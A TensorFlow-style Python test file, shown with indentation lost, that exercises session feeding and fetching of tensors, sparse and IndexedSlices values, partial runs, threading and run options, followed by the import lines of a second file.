indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
shape = np.array([7, 9, 2]).astype(np.int64)
sp = array_ops.sparse_placeholder(dtype=np.float32,
shape=shape,
name='placeholder1')
self.assertAllEqual(sp.shape.eval(session=s), shape)
self.assertAllEqual(tensor_util.constant_value(sp.shape), shape)
sp_indices = array_ops.identity(sp.indices)
sp_values = array_ops.identity(sp.values)
sp_shape = array_ops.identity(sp.shape)
# Feed with tuple
indices_out, values_out, shape_out = s.run(
[sp_indices, sp_values, sp_shape], {sp: (indices, values)})
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(values_out, values)
self.assertAllEqual(shape_out, shape)
def testFetchIndexedSlices(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices),
constant_op.constant(dense_shape))
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlices(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = np.array([7, 9, 2]).astype(np.int64)
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
array_ops.placeholder(dtype=np.int64,
shape=(3,)),)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind_dense_shape = array_ops.identity(ind.dense_shape)
ind2 = ops.IndexedSlices(ind_values, ind_indices, ind_dense_shape)
# Feed with tuple
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: (values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue
values_out, indices_out, dense_shape_out = s.run(
[ind_values, ind_indices, ind_dense_shape],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testFetchIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
values = np.array([1.0, 2.0]).astype(np.float32)
dense_shape = None
ind = ops.IndexedSlices(
constant_op.constant(values), constant_op.constant(indices), None)
# Single fetch, use as tuple
ind_out = s.run(ind)
values_out, indices_out, dense_shape_out = ind_out
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# Single fetch, use as IndexedSlicesValue
ind_out = s.run(ind)
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
# Tuple fetch, use as tuple
values_out, indices_out, dense_shape_out = s.run(ind)
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as tuple
(values_out, indices_out, dense_shape_out), = s.run([ind])
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
self.assertAllEqual(dense_shape_out, dense_shape)
# List fetch, use as IndexedSlicesValue
ind_out, = s.run([ind])
self.assertAllEqual(ind_out.values, values)
self.assertAllEqual(ind_out.indices, indices)
self.assertAllEqual(ind_out.dense_shape, dense_shape)
def testFeedIndexedSlicesWithoutDenseShape(self):
with session.Session() as s:
values = np.array([1.0, 2.0]).astype(np.float32)
indices = np.array([[3, 2, 0], [4, 5, 1]]).astype(np.int64)
dense_shape = None
ind = ops.IndexedSlices(
array_ops.placeholder(dtype=np.float32,
shape=(2,)),
array_ops.placeholder(dtype=np.int64,
shape=(2, 3)),
None)
ind_values = array_ops.identity(ind.values)
ind_indices = array_ops.identity(ind.indices)
ind2 = ops.IndexedSlices(ind_values, ind_indices)
# Feed with tuple
values_out, indices_out = s.run(
[ind_values, ind_indices], {ind: (values, indices)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue
values_out, indices_out = s.run(
[ind_values, ind_indices],
{ind: ops.IndexedSlicesValue(values, indices, dense_shape)})
self.assertAllEqual(values_out, values)
self.assertAllEqual(indices_out, indices)
# Feed with IndexedSlicesValue, fetch IndexedSlicesValue
ind2_out = s.run(ind2, {ind: ops.IndexedSlicesValue(values, indices,
dense_shape)})
self.assertAllEqual(ind2_out.values, values)
self.assertAllEqual(ind2_out.indices, indices)
self.assertAllEqual(ind2_out.dense_shape, dense_shape)
def testExtendWithStatelessOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
# Extend will happen here.
e_val = s.run(e)
self.assertAllEqual([[24.0]], e_val)
def testExtendWithStatefulOperations(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testExtendWithStatefulOperations_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
# Extend will happen here.
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
def testExtendWithGroupBy(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
p = variables.Variable(a, name='testExtendWithGroupBy_p')
a_val = a.eval() # Force an Extend after this op.
self.assertAllEqual([[1.0, 1.0]], a_val)
b = constant_op.constant(2.0, shape=[1, 2])
q = variables.Variable(b, name='testExtendWithGroupBy_q')
# Extend will happen here.
init = control_flow_ops.group(p.initializer, q.initializer)
s.run(init)
p_val, q_val = s.run([p, q])
self.assertAllEqual([[1.0, 1.0]], p_val)
self.assertAllEqual([[2.0, 2.0]], q_val)
def testTensorGetMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
c_val = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], c_val)
fed_c_val = c.eval(feed_dict={a.name: [[4.0, 4.0]]})
self.assertAllEqual([[16.0, 16.0, 16.0]], fed_c_val)
def testOperationRunMethod(self):
with session.Session():
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 2], name='b')
v = variables.Variable(a, a.dtype)
assign_a_to_v = state_ops.assign(v, a)
assign_a_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[1.0, 1.0]], v_val)
assign_b_to_v = state_ops.assign(v, b)
assign_b_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[2.0, 2.0]], v_val)
assign_b_to_v.eval(feed_dict={'b:0': [[3.0, 3.0]]})
v_val = v.eval()
self.assertAllEqual([[3.0, 3.0]], v_val)
def testDefaultGraph(self):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
self.assertEqual(ops.get_default_graph(), a.graph)
self.assertEqual(ops.get_default_graph(), b.graph)
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='testDefaultGraph_v')
v.initializer.run()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def _testDefaultGraphInThread(self, constructed_event, continue_event, i):
with session.Session() as s:
self.assertEqual(ops.get_default_graph(), s.graph)
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
v = variables.Variable(c, name='var_%d' % i)
# Block here until all threads have constructed their graph.
constructed_event.set()
continue_event.wait()
assign_c_to_v = state_ops.assign(v, c)
v.initializer.run()
assign_c_to_v.eval()
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
d = constant_op.constant(3.0, shape=[2, 3])
e = math_ops.matmul(a, d)
assign_e_to_v = state_ops.assign(v, e)
e_val = e.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], e_val)
v_val = v.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], v_val)
s.run(assign_e_to_v)
v_val = v.eval()
self.assertAllEqual([[6.0, 6.0, 6.0]], v_val)
self.assertEqual(ops.get_default_graph(), s.graph)
def testDefaultGraphWithThreads(self):
# Fork ten threads that use their thread-local default graph.
threads = []
constructed_events = [threading.Event() for _ in range(10)]
continue_event = threading.Event()
for i, constructed_event in enumerate(constructed_events):
t = self.checkedThread(target=self._testDefaultGraphInThread,
args=(constructed_event, continue_event, i))
threads.append(t)
for t in threads:
t.start()
for constructed_event in constructed_events:
constructed_event.wait()
continue_event.set()
for t in threads:
t.join()
def testParallelRun(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
ev = threading.Event()
def run_step():
ev.wait()
val = c.eval(session=sess)
self.assertEqual(val, 5.0)
threads = [self.checkedThread(target=run_step) for _ in range(100)]
for t in threads:
t.start()
ev.set()
for t in threads:
t.join()
def testRunFeedDict(self):
with session.Session() as s:
x = array_ops.zeros([2])
y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)})
self.assertAllEqual(y, 2 * np.ones(2))
y = s.run(2 * x, feed_dict={x: [1, 1]})
assert (y == 2 * np.ones(2)).all()
# Test nested tuple keys
z = (((array_ops.zeros([2]),),), array_ops.zeros([2]),
(array_ops.zeros([2]),))
result = [z[0][0][0] * 2, z[1] * 2, z[2][0] * 2]
values = (((np.array([1, 1]),),), np.array([2, 2]), (np.array([3, 3]),))
result_value = s.run(result, feed_dict={z: values})
self.assertAllEqual(result_value[0], 2 * np.ones(2))
self.assertAllEqual(result_value[1], 2 * np.array([2, 2]))
self.assertAllEqual(result_value[2], 2 * np.array([3, 3]))
def testGraphDef(self):
with session.Session() as sess:
self.assertProtoEquals(
'versions { producer: %d min_consumer: %d }' % (
versions.GRAPH_DEF_VERSION,
versions.GRAPH_DEF_VERSION_MIN_CONSUMER),
sess.graph_def)
c = constant_op.constant(5.0, name='c')
self.assertEquals(len(sess.graph_def.node), 1)
d = constant_op.constant(6.0, name='d')
self.assertEquals(len(sess.graph_def.node), 2)
self.assertAllEqual(c.eval(), 5.0)
self.assertAllEqual(d.eval(), 6.0)
e = constant_op.constant(7.0, name='e')
self.assertEquals(len(sess.graph_def.node), 3)
self.assertAllEqual(e.eval(), 7.0)
def testUseAfterClose(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)):
sess.run(c)
def testUseAfterCloseConcurrent(self):
with session.Session() as sess:
c = constant_op.constant(5.0)
self.assertAllEqual(sess.run(c), 5.0)
def update_thread():
with self.assertRaisesWithPredicateMatch(
RuntimeError,
lambda e: 'Attempted to use a closed Session.' in str(e)):
while True:
sess.run(c)
t = threading.Thread(target=update_thread)
t.start()
time.sleep(0.1)
sess.close()
t.join()
def testUseEmptyGraph(self):
with session.Session() as sess:
with self.assertRaisesWithPredicateMatch(
RuntimeError, lambda e: 'The Session graph is empty.' in str(e)):
sess.run([])
def testNotEntered(self):
# pylint: disable=protected-access
self.assertEqual(ops._default_session_stack.get_default(), None)
# pylint: enable=protected-access
with ops.device('/cpu:0'):
sess = session.Session()
c_1 = constant_op.constant(5.0)
with sess.graph.as_default():
c_2 = constant_op.constant(5.0)
self.assertEqual(c_1.graph, c_2.graph)
self.assertEqual(sess.run(c_2), 5.0)
with self.assertRaisesWithPredicateMatch(
ValueError, lambda e: 'No default session is registered.' in str(e)):
c_2.eval()
def testInteractive(self):
with ops.device('/cpu:0'):
sess = session.InteractiveSession()
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval())
d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1])
e = math_ops.matmul(c, d)
self.assertAllEqual([[24.0]], e.eval())
sess.close()
def testInteractivePlacePrunedGraph(self):
sess = session.InteractiveSession()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
# Only run the valid op, this should work.
b.eval()
with self.assertRaises(errors.InvalidArgumentError):
a.eval()
sess.close()
def testDefaultSessionPlacePrunedGraph(self):
sess = session.Session()
# Build a graph that has a bad op in it (no kernel).
#
# This test currently does not link in any GPU kernels,
# which is why placing this is invalid. If at some point
# GPU kernels are added to this test, some other different
# op / device combo should be chosen.
with ops.device('/gpu:0'):
_ = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(1.0, shape=[1, 2])
with self.assertRaises(errors.InvalidArgumentError):
# Even though we don't run the bad op, we place the entire
# graph, which should fail with a non-interactive session.
sess.run(b)
sess.close()
def testSharedGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
with session.Session(graph=g) as sess1:
with session.Session(graph=g) as sess2:
self.assertAllEqual(sess1.run(c), sess2.run(c))
def testDuplicatedInputs(self):
with session.Session() as sess:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[1, 3])
a_val, b_val, a2_val = sess.run([a, b, a])
self.assertAllEqual(a_val, [[1.0, 1.0]])
self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]])
self.assertAllEqual(a2_val, [[1.0, 1.0]])
def testFeedAndFetch(self):
with session.Session() as sess:
for dtype in [dtypes.float16,
dtypes.float32,
dtypes.float64,
dtypes.int32,
dtypes.uint8,
dtypes.int16,
dtypes.int8,
dtypes.int64,
dtypes.bool,
dtypes.complex64,
dtypes.complex128]:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
np_dtype = dtype.as_numpy_dtype
feed_t = array_ops.placeholder(dtype=dtype, shape=shape)
out_t = array_ops.identity(feed_t)
np_array = np.random.randint(-10, 10, shape)
if dtype == dtypes.bool:
np_array = np_array > 0
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
elif dtype == dtypes.complex64:
np_array = np.sqrt(np_array.astype(np_dtype))
else:
np_array = np_array.astype(np_dtype)
self.assertAllEqual(np_array,
sess.run(out_t, feed_dict={feed_t: np_array}))
# Check that we can also get the feed back.
self.assertAllEqual(np_array,
sess.run(feed_t, feed_dict={feed_t: np_array}))
# Also check that we can get both back.
out_v, feed_v = sess.run([out_t, feed_t],
feed_dict={feed_t: np_array})
self.assertAllEqual(np_array, out_v)
self.assertAllEqual(np_array, feed_v)
def testFeedError(self):
with session.Session() as sess:
feed_t = array_ops.placeholder(dtype=dtypes.float32)
out_t = array_ops.identity(feed_t)
feed_val = constant_op.constant(5.0)
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
sess.run(out_t, feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.eval(feed_dict={feed_t: feed_val})
with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'):
out_t.op.run(feed_dict={feed_t: feed_val})
def testFeedPrecisionLossError(self):
with session.Session() as sess:
largest_int64 = np.iinfo(np.int64).max
feed_int_implicit_int32 = constant_op.constant(1)
feed_int_explicit_int32 = constant_op.constant(1, dtype=dtypes.int32)
out_t = constant_op.constant(1.0)
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_implicit_int32: largest_int64})
with self.assertRaisesRegexp(TypeError,
'is not compatible with Tensor type'):
sess.run(out_t, feed_dict={feed_int_explicit_int32: largest_int64})
def testStringFetch(self):
with session.Session():
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape) if size > 0 else []
c = constant_op.constant(c_list)
self.assertAllEqual(c.eval(), c_list)
def testStringFeed(self):
with session.Session() as sess:
for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]:
size = 1
for s in shape:
size *= s
c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)],
dtype=np.object).reshape(shape)
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape)
c = array_ops.identity(feed_t)
self.assertAllEqual(sess.run(c, feed_dict={feed_t: c_list}), c_list)
self.assertAllEqual(sess.run(feed_t, feed_dict={feed_t: c_list}),
c_list)
c_v, feed_v = sess.run([c, feed_t], feed_dict={feed_t: c_list})
self.assertAllEqual(c_v, c_list)
self.assertAllEqual(feed_v, c_list)
def testStringFeedWithNullCharacters(self):
with session.Session():
c_list = [b'\n\x01\x00', b'\n\x00\x01']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
self.assertEqual(c_list[0], out[0])
self.assertEqual(c_list[1], out[1])
def testStringFeedWithUnicode(self):
with session.Session():
c_list = [u'\n\x01\x00', u'\n\x00\x01',
u'\u26a3 unicode', u'\U0001f60e deal with it']
feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[len(c_list)])
c = array_ops.identity(feed_t)
out = c.eval(feed_dict={feed_t: c_list})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)})
for i in range(len(c_list)):
self.assertEqual(c_list[i], out[i].decode('utf-8'))
def testInvalidTargetFails(self):
with self.assertRaisesRegexp(
errors.NotFoundError,
'No session factory registered for the given session options'):
session.Session('INVALID_TARGET')
def testFetchByNameDifferentStringTypes(self):
with session.Session() as sess:
c = constant_op.constant(42.0, name='c')
d = constant_op.constant(43.0, name=u'd')
e = constant_op.constant(44.0, name=b'e')
f = constant_op.constant(45.0, name=r'f')
self.assertTrue(isinstance(c.name, six.text_type))
self.assertTrue(isinstance(d.name, six.text_type))
self.assertTrue(isinstance(e.name, six.text_type))
self.assertTrue(isinstance(f.name, six.text_type))
self.assertEqual(42.0, sess.run('c:0'))
self.assertEqual(42.0, sess.run(u'c:0'))
self.assertEqual(42.0, sess.run(b'c:0'))
self.assertEqual(42.0, sess.run(r'c:0'))
self.assertEqual(43.0, sess.run('d:0'))
self.assertEqual(43.0, sess.run(u'd:0'))
self.assertEqual(43.0, sess.run(b'd:0'))
self.assertEqual(43.0, sess.run(r'd:0'))
self.assertEqual(44.0, sess.run('e:0'))
self.assertEqual(44.0, sess.run(u'e:0'))
self.assertEqual(44.0, sess.run(b'e:0'))
self.assertEqual(44.0, sess.run(r'e:0'))
self.assertEqual(45.0, sess.run('f:0'))
self.assertEqual(45.0, sess.run(u'f:0'))
self.assertEqual(45.0, sess.run(b'f:0'))
self.assertEqual(45.0, sess.run(r'f:0'))
def testIncorrectGraph(self):
with ops.Graph().as_default() as g_1:
c_1 = constant_op.constant(1.0, name='c')
with ops.Graph().as_default() as g_2:
c_2 = constant_op.constant(2.0, name='c')
self.assertEqual('c', c_1.op.name)
self.assertEqual('c', c_2.op.name)
with session.Session(graph=g_1) as sess_1:
self.assertEqual(1.0, sess_1.run(c_1))
with self.assertRaises(ValueError):
sess_1.run(c_2)
with self.assertRaises(ValueError):
sess_1.run(c_2.op)
with session.Session(graph=g_2) as sess_2:
with self.assertRaises(ValueError):
sess_2.run(c_1)
with self.assertRaises(ValueError):
sess_2.run(c_1.op)
self.assertEqual(2.0, sess_2.run(c_2))
def testPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 17
res = sess.partial_run(h, r2, feed_dict={c: temp})
self.assertEqual(153, res)
# Call again on the same graph.
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 18
res = sess.partial_run(h2, r2, feed_dict={c: temp})
self.assertEqual(162, res)
def testPartialRunIncomplete(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
def testConcurrentPartialRun(self):
with session.Session() as sess:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.mul(r1, c)
h1 = sess.partial_run_setup([r1], [a, b, c])
h2 = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2})
self.assertEqual(3, res)
temp = res * 19
res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9})
self.assertEqual(66, res)
res = sess.partial_run(h2, r2, feed_dict={c: 7})
self.assertEqual(462, res)
def testManyPartialRun(self):
with session.Session() as sess:
steps = 200
inputs = []
outputs = []
a = constant_op.constant(2.0, dtypes.float32)
for i in xrange(steps):
inputs.append(array_ops.placeholder(dtypes.float32, shape=[]))
a = math_ops.mul(a, inputs[i])
outputs.append(a)
h = sess.partial_run_setup(outputs, inputs)
for i in xrange(steps):
res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0})
self.assertEqual(2.0, res)
feed_dict = {}
for i in xrange(steps):
feed_dict[inputs[i]] = 1.0
res = sess.run(outputs, feed_dict)
self.assertEqual(steps, len(res))
self.assertEqual(2.0, res[-1])
def testRunAndPartialRun(self):
with session.Session() as sess:
a = constant_op.constant(2.0, dtypes.float32)
b = a * 2
c = b * 3
r1 = sess.run([b, c])
h = sess.partial_run_setup([b, c], [])
r2 = sess.partial_run(h, [b, c])
self.assertEqual(r1, r2)
def testFeedDictKeyException(self):
with session.Session() as sess:
a = constant_op.constant(1.0, dtypes.float32, name='a')
with self.assertRaisesRegexp(TypeError, 'Cannot interpret feed_dict'):
sess.run(a, feed_dict={'a': [2.0]})
def testPerStepTrace(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
sess.run(constant_op.constant(1.0))
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0),
options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testRunOptionsRunMetadata(self):
run_options = config_pb2.RunOptions(
trace_level=config_pb2.RunOptions.FULL_TRACE)
run_metadata = config_pb2.RunMetadata()
with ops.device('/cpu:0'):
with session.Session() as sess:
# all combinations are valid
sess.run(constant_op.constant(1.0), options=None, run_metadata=None)
sess.run(constant_op.constant(1.0), options=None,
run_metadata=run_metadata)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=None)
self.assertTrue(not run_metadata.HasField('step_stats'))
sess.run(constant_op.constant(1.0), options=run_options,
run_metadata=run_metadata)
self.assertTrue(run_metadata.HasField('step_stats'))
self.assertEquals(len(run_metadata.step_stats.dev_stats), 1)
def testFeedShapeCompatibility(self):
with session.Session() as sess:
some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0])
new_shape = constant_op.constant([2, 2])
reshaped_tensor = array_ops.reshape(some_tensor, new_shape)
with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'):
sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]})
with self.assertRaisesRegexp(ValueError, 'may not be fed'):
sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]})
def testInferShapesFalse(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session()
self.assertFalse('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testInferShapesTrue(self):
config = config_pb2.ConfigProto(
graph_options=config_pb2.GraphOptions(infer_shapes=True))
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant([[1, 2]])
sess = session.Session(config=config)
self.assertTrue('_output_shapes' in sess.graph_def.node[0].attr)
# Avoid lint error regarding 'unused' var a.
self.assertTrue(a == a)
def testBuildCostModel(self):
run_options = config_pb2.RunOptions()
config = config_pb2.ConfigProto(
allow_soft_placement=True,
graph_options=config_pb2.GraphOptions(build_cost_model=100))
with session.Session(config=config) as sess:
with ops.device('/gpu:0'):
a = array_ops.placeholder(dtypes.float32, shape=[])
b = math_ops.add(a, a)
c = array_ops.identity(b)
d = math_ops.mul(c, c)
for step in xrange(120):
run_metadata = config_pb2.RunMetadata()
sess.run(d, feed_dict={a: 1.0},
options=run_options, run_metadata=run_metadata)
if step == 99:
self.assertTrue(run_metadata.HasField('cost_graph'))
else:
self.assertFalse(run_metadata.HasField('cost_graph'))
def testNonInteractiveSessionNesting(self):
sess1 = session.Session()
sess1_controller = sess1.as_default()
sess1_controller.__enter__()
sess2 = session.Session()
sess2_controller = sess2.as_default()
sess2_controller.__enter__()
with self.assertRaisesRegexp(AssertionError, 'Nesting violated'):
sess1_controller.__exit__(None, None, None)
ops._default_session_stack.reset()
def testInteractiveSessionNesting(self):
sess1 = session.InteractiveSession()
sess2 = session.InteractiveSession()
del sess1
del sess2
def testInvalidArgument(self):
with self.assertRaisesRegexp(TypeError, 'target must be a string'):
session.Session(37)
with self.assertRaisesRegexp(TypeError, 'config must be a tf.ConfigProto'):
session.Session(config=37)
with self.assertRaisesRegexp(TypeError, 'graph must be a tf.Graph'):
session.Session(graph=37)
def testTimeoutWithShortOperations(self):
num_epochs = 5
q = data_flow_ops.FIFOQueue(
capacity=50, dtypes=[dtypes.int32], shapes=[()])
enqueue_op = q.enqueue_many(constant_op.constant([1, 2]))
# Use a 10-second timeout, which should be longer than any
# non-blocking enqueue_many op.
config = config_pb2.ConfigProto(operation_timeout_in_ms=10000)
with session.Session(config=config) as sess:
for _ in range(num_epochs):
sess.run(enqueue_op)
self.assertEqual(sess.run(q.size()), num_epochs * 2)
if __name__ == '__main__':
googletest.main()
|
test.py
|
import json
import os.path as p
import random
import socket
import subprocess
import threading
import time
import logging
import io
import string
import avro.schema
import avro.io
import avro.datafile
